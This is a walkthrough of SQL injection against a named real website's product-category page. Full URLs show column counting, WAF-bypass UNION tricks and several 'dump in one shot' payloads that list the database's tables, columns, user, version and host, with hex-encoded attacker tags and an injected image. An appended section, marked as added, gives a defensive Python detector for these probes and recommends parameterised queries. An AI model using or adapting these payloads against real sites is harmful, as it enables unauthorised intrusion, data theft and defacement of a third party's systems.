Solution: Hard SQL Injection with DIOS
First, as usual, we append a single quote (') to the end of the parameter.
Result: http://www.landp-farm.com/product_categories.php?id=31'
Next we try a balance.
Result: http://www.landp-farm.com/product_categories.php?id=31%27--%20- (error)
We try replacing the %27 with %20.
Now the page is back to normal (no error).
We try order by 1.
Result: http://www.landp-farm.com/product_categories.php?id=31%20order%20by%201--%20-
Keep increasing the number until an error appears.
The error appears at 13, which means there are only 12 columns.
We try union select.
Result: http://www.landp-farm.com/product_categories.php?id=31%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12--%20-
Oops, an error. We try a WAF bypass.
And%20.0UnIOn--%20-%0ASeLe%43t
I try this WAF bypass.
The page is back to normal.
Now the golden number (the column that is reflected in the page) shows up: 2.
We try a DIOS.
Result: http://www.landp-farm.com/product_categories.php?id=31%20And%20.0UnIOn--%20-%0ASeLeCt%201,concat(0x3c696d67207372633d2268747470733a2f2f652e746f7034746f702e696f2f705f313735337370767936302e6a7067222077696474683d2233303022206865696768743d22333030223e,0x3c62723e,0x494e4a45434b20425920487378517858374033585f343033447c7c,0x3c62723e,current_user,0x3c62723e,version(),0x3c62723e,database(),0x3c62723e,0x3c62723e,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)),3,4,5,6,7,8,9,10,11,12--%20-
SELECT * FROM ck_cate _product WHERE cate_pro_id=
You have an error in your SQL syntax check the manual that corresponds to your MYSQL server version for the right syntax to use near " at line 1
An error. We try a DIOS with a WAF bypass.
Result: http://www.landp-farm.com/product_categories.php?id=31%20And%20.0UnIOn--%20-%0ASeLeCt%201,concat/**//**8**/(0x3c696d67207372633d2268747470733a2f2f652e746f7034746f702e696f2f705f313735337370767936302e6a7067222077696474683d2233303022206865696768743d22333030223e,0x3c62723e,0x4b6973736564427948737851785837,0x3c62723e,database/**//**8**/(),0x3c62723e,version/**//**8**/(),0x3c62723e,current_user,0x3c62723e,NOW(),0x3c62723e,/*!50000@@version_compile_os*/,0x3c62723e,@@hostname,0x3c62723e,/*!50000@@GLOBAL.have_ssl*/,0x3c62723e,/*!50000@@GLOBAL.have_symlink*/,0x3c62723e,/*!50000@@port*/,(select(@x)/*!50000from/**kontol**/*/(/*!50000select/**kontol**/*/(@x:=0x00),(select(0)/*!From/**kontol**/*/(/*!50000information_schema.columns/**kontol**/*/)/*!50000where/**kontol**/*/(table_schema=database/*kontol*//**kontol*/())and(0x00)in(@x:=/*!50000coNcat/**kontol**/*/(@x,0x3c6c693e,/*!50000table_name/**kontol**/*/,0x3a3a,/*!50000column_name/**kontol**/*/))))x)),3,4,5,6,7,8,9,10,11,12--%20-
SELECT * FROM ck_cate _product WHERE cate_pro_id=
You have an error in your SQL syntax check the manual that corresponds to your MYSQL server version for the right syntax to use near " at line 1
Another error. We try crafting our own DIOS.
(SELECT+GROUP_CONCAT(0x3c62723e,table_name,0x3a3a,column_name)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_SCHEMA=DATABASE())
We try this DIOS... and boom.
All that is left is to add img+nick+version+database+user.
That's all, thank you.
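
Added example, not part of the original post: a log-triage helper showing why a keyword filter misses `And .0UnIOn-- -%0ASeLe%43t` and how normalizing the `id` value before matching flags each probe in this walkthrough. The function names, rule names and sample query strings are constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Signatures run on the normalized value. No leading \b on "union": in
# ".0UnIOn" the keyword directly follows a digit, so \bunion never matches.
RULES = {
    "union_select": re.compile(
        r"(?<![a-z_])union\s+(?:all\s+|distinct\s+)?select(?![a-z_])"),
    "order_by_probe": re.compile(r"(?<![a-z_])order\s+by\s+\d+"),
    "schema_enum": re.compile(r"information_schema"),
}

def normalize(value: str) -> str:
    """Reduce a URL-decoded parameter value to roughly what MySQL parses."""
    s = re.sub(r"/\*!\d*", " ", value)            # /*!50000 ... */ bodies execute: keep them
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)  # plain /* ... */ comments act as whitespace
    s = s.replace("*/", " ")                      # closers left behind by unwrapped comments
    s = re.sub(r"(?:--(?=\s)|#)[^\n]*", " ", s)   # line comments end at the newline (%0A)
    return re.sub(r"\s+", " ", s).strip().lower()

def classify(query_string: str, param: str = "id") -> list[str]:
    """Return the names of the rules that fire for one request's query string."""
    hits = []
    # parse_qs percent-decodes, so %43 is already "C" and %0A a newline here.
    for value in parse_qs(query_string, keep_blank_values=True).get(param, []):
        if not re.fullmatch(r"\d+", value):       # the id is numeric; anything else is anomalous
            hits.append("non_numeric_id")
        norm = normalize(value)
        hits += [name for name, rx in RULES.items() if rx.search(norm)]
    return hits

# Constructed sample query strings modelled on the steps above (not real logs).
SAMPLES = [
    "id=31",
    "id=31%27",
    "id=31%20order%20by%2013--%20-",
    "id=31%20And%20.0UnIOn--%20-%0ASeLe%43t%201,2,3",
    "id=31%20and%20(select(0)/*!From/**x**/*/(/*!50000information_schema.columns/**x**/*/))",
]

if __name__ == "__main__":
    for qs in SAMPLES:
        print(classify(qs) or ["clean"], qs)
```

The `non_numeric_id` rule is the one that matters most: the parameter is a numeric key, so validating it as an integer and binding it in a prepared statement closes the hole regardless of how the keywords are disguised.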
